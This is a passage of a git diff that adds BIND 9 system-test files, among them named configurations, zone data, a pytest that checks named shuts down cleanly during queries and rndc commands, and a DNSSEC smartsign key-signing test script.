* file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + listen-on { 10.53.0.2; }; + pid-file "named.pid"; + notify no; + dnssec-validation no; + allow-query { any; }; +}; + +# 10.53.0.2 is authoritative for .test domain +zone "test" { + type master; + file "test.db"; + allow-transfer { none; }; +}; diff --git a/bin/tests/system/shutdown/ns2/test.db b/bin/tests/system/shutdown/ns2/test.db new file mode 100644 index 0000000..91c16ec --- /dev/null +++ b/bin/tests/system/shutdown/ns2/test.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 + +@ IN SOA ns1 root.test. 2020040101 4h 1h 1w 60 +@ IN NS ns1 +ns1 IN A 10.53.0.2 +@ IN A 10.53.0.2 +www IN A 10.53.0.2 diff --git a/bin/tests/system/shutdown/prereq.sh b/bin/tests/system/shutdown/prereq.sh new file mode 100755 index 0000000..9f46512 --- /dev/null +++ b/bin/tests/system/shutdown/prereq.sh @@ -0,0 +1,38 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if test -n "$PYTHON" +then + if $PYTHON -c "import pytest" 2> /dev/null + then + : + else + echo_i "This test requires the pytest framework." >&2 + fi + + if $PYTHON -c "import dns" 2> /dev/null + then + : + else + echo_i "This test requires the dnspython module." >&2 + exit 1 + fi +else + echo_i "This test requires Python, the pytest framework and the dnspython module." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/shutdown/resolver/named.conf.in b/bin/tests/system/shutdown/resolver/named.conf.in new file mode 100644 index 0000000..f8444e3 --- /dev/null +++ b/bin/tests/system/shutdown/resolver/named.conf.in @@ -0,0 +1,47 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +logging { + channel basic { + file "named.run"; + severity debug 999; + print-time yes; + }; + category default { basic; }; +}; +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + listen-on { 10.53.0.3; }; + pid-file "named.pid"; + notify no; + dnssec-validation no; + allow-query { any; }; + allow-recursion { any; }; +}; + +zone "." { + type hint; + file "root.db"; +}; diff --git a/bin/tests/system/shutdown/resolver/root.db b/bin/tests/system/shutdown/resolver/root.db new file mode 100644 index 0000000..88e0ba8 --- /dev/null +++ b/bin/tests/system/shutdown/resolver/root.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA a.root. root.root. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. IN NS a.root. +a.root. IN A 10.53.0.1 diff --git a/bin/tests/system/shutdown/setup.sh b/bin/tests/system/shutdown/setup.sh new file mode 100644 index 0000000..575abc6 --- /dev/null +++ b/bin/tests/system/shutdown/setup.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# touch dnsrps-off to not test with DNSRPS + +set -e + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports resolver/named.conf.in resolver/named.conf diff --git a/bin/tests/system/shutdown/tests_shutdown.py b/bin/tests/system/shutdown/tests_shutdown.py new file mode 100755 index 0000000..b6083b7 --- /dev/null +++ b/bin/tests/system/shutdown/tests_shutdown.py @@ -0,0 +1,209 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from concurrent.futures import ThreadPoolExecutor, as_completed +import os +import random +import signal +import subprocess +from string import ascii_lowercase as letters +import time + +import pytest + +pytest.importorskip("dns") +import dns.exception +import dns.resolver + + +def do_work(named_proc, resolver, rndc_cmd, kill_method, n_workers, n_queries): + """Creates a number of A queries to run in parallel + in order simulate a slightly more realistic test scenario. + + The main idea of this function is to create and send a bunch + of A queries to a target named instance and during this process + a request for shutting down named will be issued. + + In the process of shutting down named, a couple control connections + are created (by launching rndc) to ensure that the crash was fixed. + + if kill_method=="rndc" named will be asked to shutdown by + means of rndc stop. + if kill_method=="sigterm" named will be killed by SIGTERM on + POSIX systems or by TerminateProcess() on Windows systems. + + :param named_proc: named process instance + :type named_proc: subprocess.Popen + + :param resolver: target resolver + :type resolver: dns.resolver.Resolver + + :param rndc_cmd: rndc command with default arguments + :type rndc_cmd: list of strings, e.g. ["rndc", "-p", "23750"] + + :kill_method: "rndc" or "sigterm" + :type kill_method: str + + :param n_workers: Number of worker threads to create + :type n_workers: int + + :param n_queries: Total number of queries to send + :type n_queries: int + """ + # pylint: disable-msg=too-many-arguments + # pylint: disable-msg=too-many-locals + + # helper function, args must be a list or tuple with arguments to rndc. + def launch_rndc(args): + return subprocess.call(rndc_cmd + args, timeout=10) + + # We're going to execute queries in parallel by means of a thread pool. + # dnspython functions block, so we need to circunvent that. + with ThreadPoolExecutor(n_workers + 1) as executor: + # Helper dict, where keys=Future objects and values are tags used + # to process results later. + futures = {} + + # 50% of work will be A queries. + # 1 work will be rndc stop. + # Remaining work will be rndc status (so we test parallel control + # connections that were crashing named). + shutdown = True + for i in range(n_queries): + if i < (n_queries // 2): + # Half work will be standard A queries. + # Among those we split 50% queries relname='www', + # 50% queries relname=random characters + if random.randrange(2) == 1: + tag = "good" + relname = "www" + else: + tag = "bad" + length = random.randint(4, 10) + relname = "".join( + letters[random.randrange(len(letters))] for i in range(length) + ) + + qname = relname + ".test" + futures[executor.submit(resolver.query, qname, "A")] = tag + elif shutdown: # We attempt to stop named in the middle + shutdown = False + if kill_method == "rndc": + futures[executor.submit(launch_rndc, ["stop"])] = "stop" + else: + futures[executor.submit(named_proc.terminate)] = "kill" + else: + # We attempt to send couple rndc commands while named is + # being shutdown + futures[executor.submit(launch_rndc, ["status"])] = "status" + + ret_code = -1 + for future in as_completed(futures): + try: + result = future.result() + # If tag is "stop", result is an instance of + # subprocess.CompletedProcess, then we check returncode + # attribute to know if rncd stop command finished successfully. + # + # if tag is "kill" then the main function will check if + # named process exited gracefully after SIGTERM signal. + if futures[future] == "stop": + ret_code = result + + except ( + dns.resolver.NXDOMAIN, + dns.resolver.NoNameservers, + dns.exception.Timeout, + ): + pass + + if kill_method == "rndc": + assert ret_code == 0 + + +def wait_for_named_loaded(resolver, retries=10): + for _ in range(retries): + try: + resolver.query("version.bind", "TXT", "CH") + return True + except (dns.resolver.NoNameservers, dns.exception.Timeout): + time.sleep(1) + return False + + +def wait_for_proc_termination(proc, max_timeout=10): + for _ in range(max_timeout): + if proc.poll() is not None: + return True + time.sleep(1) + + proc.send_signal(signal.SIGABRT) + for _ in range(max_timeout): + if proc.poll() is not None: + return True + time.sleep(1) + + return False + + +def test_named_shutdown(named_port, control_port): + # pylint: disable-msg=too-many-locals + cfg_dir = os.path.join(os.getcwd(), "resolver") + assert os.path.isdir(cfg_dir) + + cfg_file = os.path.join(cfg_dir, "named.conf") + assert os.path.isfile(cfg_file) + + named = os.getenv("NAMED") + assert named is not None + + rndc = os.getenv("RNDC") + assert rndc is not None + + systest_dir = os.getenv("SYSTEMTESTTOP") + assert systest_dir is not None + + # rndc configuration resides in $SYSTEMTESTTOP/common/rndc.conf + rndc_cfg = os.path.join(systest_dir, "common", "rndc.conf") + assert os.path.isfile(rndc_cfg) + + # rndc command with default arguments. + rndc_cmd = [rndc, "-c", rndc_cfg, "-p", str(control_port), "-s", "10.53.0.3"] + + # We create a resolver instance that will be used to send queries. + resolver = dns.resolver.Resolver() + resolver.nameservers = ["10.53.0.3"] + resolver.port = named_port + + # We test named shutting down using two methods: + # Method 1: using rndc ctop + # Method 2: killing with SIGTERM + # In both methods named should exit gracefully. + for kill_method in ("rndc", "sigterm"): + named_cmdline = [named, "-c", cfg_file, "-f"] + with subprocess.Popen(named_cmdline, cwd=cfg_dir) as named_proc: + try: + assert named_proc.poll() is None, "named isn't running" + assert wait_for_named_loaded(resolver) + do_work( + named_proc, + resolver, + rndc_cmd, + kill_method, + n_workers=12, + n_queries=16, + ) + assert wait_for_proc_termination(named_proc) + assert named_proc.returncode == 0, "named crashed" + finally: # Ensure named is terminated in case of an exception + named_proc.kill() diff --git a/bin/tests/system/smartsign/child.db b/bin/tests/system/smartsign/child.db new file mode 100644 index 0000000..878df45 --- /dev/null +++ b/bin/tests/system/smartsign/child.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 60 ; 1 minute +child.parent.nil IN SOA ns.child.parent.nil. hostmaster.parent.nil. ( + 1 ; serial + 2000 ; refresh (33 minutes 20 seconds) + 2000 ; retry (33 minutes 20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns.child.parent.nil. +$ORIGIN child.parent.nil. +$TTL 300 ; 5 minutes +ns A 10.53.0.3 diff --git a/bin/tests/system/smartsign/clean.sh b/bin/tests/system/smartsign/clean.sh new file mode 100644 index 0000000..ad975af --- /dev/null +++ b/bin/tests/system/smartsign/clean.sh @@ -0,0 +1,15 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f K* dsset-* *.signed dnskey.sigs other.sigs dsset.out +rm -f ns*/named.lock diff --git a/bin/tests/system/smartsign/parent.db b/bin/tests/system/smartsign/parent.db new file mode 100644 index 0000000..a5484e3 --- /dev/null +++ b/bin/tests/system/smartsign/parent.db @@ -0,0 +1,31 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +parent.nil IN SOA ns1.parent.nil. hostmaster.parent.nil. ( + 1 ; serial + 2000 ; refresh (33 minutes 20 seconds) + 2000 ; retry (33 minutes 20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns1.parent.nil. + NS ns2.parent.nil. +$ORIGIN parent.nil. +$TTL 3600 ; 1 hour +a A 1.1.1.1 +$TTL 300 ; 5 minutes +ns1 A 10.53.0.1 +ns2 A 10.53.0.2 + +child NS ns.child +ns.child A 10.53.0.3 diff --git a/bin/tests/system/smartsign/tests.sh b/bin/tests/system/smartsign/tests.sh new file mode 100644 index 0000000..ffde69e --- /dev/null +++ b/bin/tests/system/smartsign/tests.sh @@ -0,0 +1,368 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +pzone=parent.nil +pfile=parent.db + +czone=child.parent.nil +cfile=child.db + +echo_i "generating child's keys" +# active zsk +czsk1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -L 30 $czone) + +# not yet published or active +czsk2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -P none -A none $czone) + +# published but not active +czsk3=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -A none $czone) + +# inactive +czsk4=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -P now-24h -A now-24h -I now $czone) + +# active in 12 hours, inactive 12 hours after that... +czsk5=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -P now+12h -A now+12h -I now+24h $czone) + +# explicit successor to czk5 +# (suppressing warning about lack of removal date) +czsk6=$($KEYGEN -q -S $czsk5 -i 6h 2>/dev/null) + +# active ksk +cksk1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk -L 30 $czone) + +# published but not YET active; will be active in 20 seconds +cksk2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $czone) +# $SETTIME moved after other $KEYGENs + +echo_i "revoking key" +# revoking key changes its ID +cksk3=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $czone) +cksk4=$($REVOKE $cksk3) + +echo_i "setting up sync key" +cksk5=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk -P now+1mo -A now+1mo -Psync now $czone) + +echo_i "and future sync key" +cksk6=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk -P now+1mo -A now+1mo -Psync now+1mo $czone) + +echo_i "generating parent keys" +pzsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} $pzone) +pksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $pzone) + +echo_i "setting child's activation time" +# using now+30s to fix RT 24561 +$SETTIME -A now+30s $cksk2 > /dev/null + +echo_i "signing child zone" +czoneout=$($SIGNER -Sg -e now+1d -X now+2d -o $czone $cfile) + +echo_i "signing parent zone" +pzoneout=$($SIGNER -Sg -o $pzone $pfile) + +czactive=$(keyfile_to_key_id $czsk1) +czgenerated=$(keyfile_to_key_id $czsk2) +czpublished=$(keyfile_to_key_id $czsk3) +czinactive=$(keyfile_to_key_id $czsk4) +czpredecessor=$(keyfile_to_key_id $czsk5) +czsuccessor=$(keyfile_to_key_id $czsk6) +ckactive=$(keyfile_to_key_id $cksk1) +ckpublished=$(keyfile_to_key_id $cksk2) +ckprerevoke=$(keyfile_to_key_id $cksk3) +ckrevoked=$(keyfile_to_key_id $cksk4) + +pzid=$(keyfile_to_key_id $pzsk) +pkid=$(keyfile_to_key_id $pksk) + +echo_i "checking dnssec-signzone output matches expectations" +ret=0 +echo "$pzoneout" | grep 'KSKs: 1 active, 0 stand-by, 0 revoked' > /dev/null || ret=1 +echo "$pzoneout" | grep 'ZSKs: 1 active, 0 stand-by, 0 revoked' > /dev/null || ret=1 +echo "$czoneout" | grep 'KSKs: 1 active, 1 stand-by, 1 revoked' > /dev/null || ret=1 +echo "$czoneout" | grep 'ZSKs: 1 active, 2 stand-by, 0 revoked' > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "parent $pzoneout" + echo_i "child $czoneout" + echo_i "failed"; +fi +status=$((status + ret)) + +echo_i "rechecking dnssec-signzone output with -x" +ret=0 +# use an alternate output file so -x doesn't interfere with later checks +pzoneout=$($SIGNER -Sxg -o $pzone -f ${pfile}2.signed $pfile) +czoneout=$($SIGNER -Sxg -e now+1d -X now+2d -o $czone -f ${cfile}2.signed $cfile) +echo "$pzoneout" | grep 'KSKs: 1 active, 0 stand-by, 0 revoked' > /dev/null || ret=1 +echo "$pzoneout" | grep 'ZSKs: 1 active, 0 present, 0 revoked' > /dev/null || ret=1 +echo "$czoneout" | grep 'KSKs: 1 active, 1 stand-by, 1 revoked' > /dev/null || ret=1 +echo "$czoneout" | grep 'ZSKs: 1 active, 2 present, 0 revoked' > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "parent $pzoneout" + echo_i "child $czoneout" + echo_i "failed"; +fi +status=$((status + ret)) + +echo_i "checking parent zone DNSKEY set" +ret=0 +grep "key id = $pzid" $pfile.signed > /dev/null || { + ret=1 + echo_i "missing expected parent ZSK id = $pzid" +} +grep "key id = $pkid" $pfile.signed > /dev/null || { + ret=1 + echo_i "missing expected parent KSK id = $pkid" +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking parent zone DS records" +ret=0 +awk '$2 == "DS" {print $3}' $pfile.signed > dsset.out +grep -w "$ckactive" dsset.out > /dev/null || ret=1 +grep -w "$ckpublished" dsset.out > /dev/null || ret=1 +# revoked key should not be there, hence the && +grep -w "$ckprerevoke" dsset.out > /dev/null && ret=1 +grep -w "$ckrevoked" dsset.out > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking child zone DNSKEY set" +ret=0 +grep "key id = $ckactive\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child KSK id = $ckactive" +} +grep "key id = $ckpublished\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child prepublished KSK id = $ckpublished" +} +grep "key id = $ckrevoked\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child revoked KSK id = $ckrevoked" +} +grep "key id = $czactive\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child ZSK id = $czactive" +} +grep "key id = $czpublished\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child prepublished ZSK id = $czpublished" +} +grep "key id = $czinactive\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child inactive ZSK id = $czinactive" +} +# should not be there, hence the && +grep "key id = $ckprerevoke\$" $cfile.signed > /dev/null && { + ret=1 + echo_i "found unexpected child pre-revoke ZSK id = $ckprerevoke" +} +grep "key id = $czgenerated\$" $cfile.signed > /dev/null && { + ret=1 + echo_i "found unexpected child generated ZSK id = $czgenerated" +} +grep "key id = $czpredecessor\$" $cfile.signed > /dev/null && { + echo_i "found unexpected ZSK predecessor id = $czpredecessor (ignored)" +} +grep "key id = $czsuccessor\$" $cfile.signed > /dev/null && { + echo_i "found unexpected ZSK successor id = $czsuccessor (ignored)" +} +#grep "key id = $czpredecessor\$" $cfile.signed > /dev/null && ret=1 +#grep "key id = $czsuccessor\$" $cfile.signed > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking key TTLs are correct" +ret=0 +grep "${czone}. 30 IN" ${czsk1}.key > /dev/null 2>&1 || ret=1 +grep "${czone}. 30 IN" ${cksk1}.key > /dev/null 2>&1 || ret=1 +grep "${czone}. IN" ${czsk2}.key > /dev/null 2>&1 || ret=1 +$SETTIME -L 45 ${czsk2} > /dev/null +grep "${czone}. 45 IN" ${czsk2}.key > /dev/null 2>&1 || ret=1 +$SETTIME -L 0 ${czsk2} > /dev/null +grep "${czone}. IN" ${czsk2}.key > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking key TTLs were imported correctly" +ret=0 +awk 'BEGIN {r = 0} $2 == "DNSKEY" && $1 != 30 {r = 1} END {exit r}' \ + ${cfile}.signed || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "re-signing and checking imported TTLs again" +ret=0 +$SETTIME -L 15 ${czsk2} > /dev/null +czoneout=$($SIGNER -Sg -e now+1d -X now+2d -o $czone $cfile) +awk 'BEGIN {r = 0} $2 == "DNSKEY" && $1 != 15 {r = 1} END {exit r}' \ + ${cfile}.signed || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# There is some weirdness in Solaris 10 (Generic_120011-14), which +# is why the next section has all those echo $ret > /dev/null;sync +# commands +echo_i "checking child zone signatures" +ret=0 +# check DNSKEY signatures first +awk '$2 == "RRSIG" && $3 == "DNSKEY" { getline; print $3 }' $cfile.signed > dnskey.sigs +sub=0 +grep -w "$ckactive" dnskey.sigs > /dev/null || sub=1 +if [ $sub != 0 ]; then echo_i "missing ckactive $ckactive (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckrevoked" dnskey.sigs > /dev/null || sub=1 +if [ $sub != 0 ]; then echo_i "missing ckrevoke $ckrevoke (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czactive" dnskey.sigs > /dev/null || sub=1 +if [ $sub != 0 ]; then echo_i "missing czactive $czactive (dnskey)"; ret=1; fi +# should not be there: +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckprerevoke" dnskey.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckprerevoke $ckprerevoke (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckpublished" dnskey.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckpublished $ckpublished (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czpublished" dnskey.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czpublished $czpublished (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czinactive" dnskey.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czinactive $czinactive (dnskey)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czgenerated" dnskey.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czgenerated $czgenerated (dnskey)"; ret=1; fi +# now check other signatures first +awk '$2 == "RRSIG" && $3 != "DNSKEY" && $3 != "CDNSKEY" && $3 != "CDS" { getline; print $3 }' $cfile.signed | sort -un > other.sigs +# should not be there: +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckactive" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckactive $ckactive (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckpublished" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckpublished $ckpublished (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckprerevoke" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckprerevoke $ckprerevoke (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$ckrevoked" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found ckrevoked $ckrevoked (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czpublished" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czpublished $czpublished (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czinactive" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czinactive $czinactive (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czgenerated" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czgenerated $czgenerated (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czpredecessor" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czpredecessor $czpredecessor (other)"; ret=1; fi +echo $ret > /dev/null +sync +sub=0 +grep -w "$czsuccessor" other.sigs > /dev/null && sub=1 +if [ $sub != 0 ]; then echo_i "found czsuccessor $czsuccessor (other)"; ret=1; fi +if [ $ret != 0 ]; then + sed 's/^/I:dnskey sigs: /' < dnskey.sigs + sed 's/^/I:other sigs: /' < other.sigs + echo_i "failed"; +fi +status=$((status + ret)) + +echo_i "checking RRSIG expiry date correctness" +dnskey_expiry=$($CHECKZONE -o - $czone $cfile.signed 2> /dev/null | + awk '$4 == "RRSIG" && $5 == "DNSKEY" {print $9; exit}' | + cut -c1-10) +soa_expiry=$($CHECKZONE -o - $czone $cfile.signed 2> /dev/null | + awk '$4 == "RRSIG" && $5 == "SOA" {print $9; exit}' | + cut -c1-10) +[ $dnskey_expiry -gt $soa_expiry ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "waiting 30 seconds for key activation" +sleep 30 +echo_i "re-signing child zone" +czoneout2=$($SIGNER -Sg -o $czone -f $cfile.new $cfile.signed) +mv $cfile.new $cfile.signed + +echo_i "checking dnssec-signzone output matches expectations" +ret=0 +echo "$czoneout2" | grep 'KSKs: 2 active, 0 stand-by, 1 revoked' > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking child zone signatures again" +ret=0 +awk '$2 == "RRSIG" && $3 == "DNSKEY" { getline; print $3 }' $cfile.signed > dnskey.sigs +grep -w "$ckpublished" dnskey.sigs > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking sync record publication" +ret=0 +awk 'BEGIN { r=1 } $2 == "CDNSKEY" { r=0 } END { exit r }' $cfile.signed || ret=1 +awk 'BEGIN { r=1 } $2 == "CDS" { r=0 } END { exit r }' $cfile.signed || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# this also checks that the future sync record is not yet published +echo_i "checking sync record deletion" +ret=0 +$SETTIME -P now -A now -Dsync now ${cksk5} > /dev/null +$SIGNER -Sg -o $czone -f $cfile.new $cfile.signed > /dev/null +mv $cfile.new $cfile.signed +awk 'BEGIN { r=1 } $2 == "CDNSKEY" { r=0 } END { exit r }' $cfile.signed && ret=1 +awk 'BEGIN { r=1 } $2 == "CDS" { r=0 } END { exit r }' $cfile.signed && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/sortlist/clean.sh b/bin/tests/system/sortlist/clean.sh new file mode 100644 index 0000000..b490f46 --- /dev/null +++ b/bin/tests/system/sortlist/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f *.dig *.good *.out +rm -f */named.memstats +rm -f */named.run +rm -f */named.conf +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/sortlist/ns1/example.db b/bin/tests/system/sortlist/ns1/example.db new file mode 100644 index 0000000..b68e215 --- /dev/null +++ b/bin/tests/system/sortlist/ns1/example.db @@ -0,0 +1,37 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns1.example. hostmaster.example. ( + 2000042795 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns1.example. +ns1.example. A 10.53.0.1 + +; Let's see what the sortlist picks out of this... +a A 1.1.1.1 +a A 1.1.1.5 +a A 1.1.1.2 +a A 192.168.3.1 +a A 1.1.1.3 +a A 192.168.1.1 +a A 1.1.1.4 + +b A 10.53.0.1 +b A 10.53.0.2 +b A 10.53.0.3 +b A 10.53.0.4 +b A 10.53.0.5 + diff --git 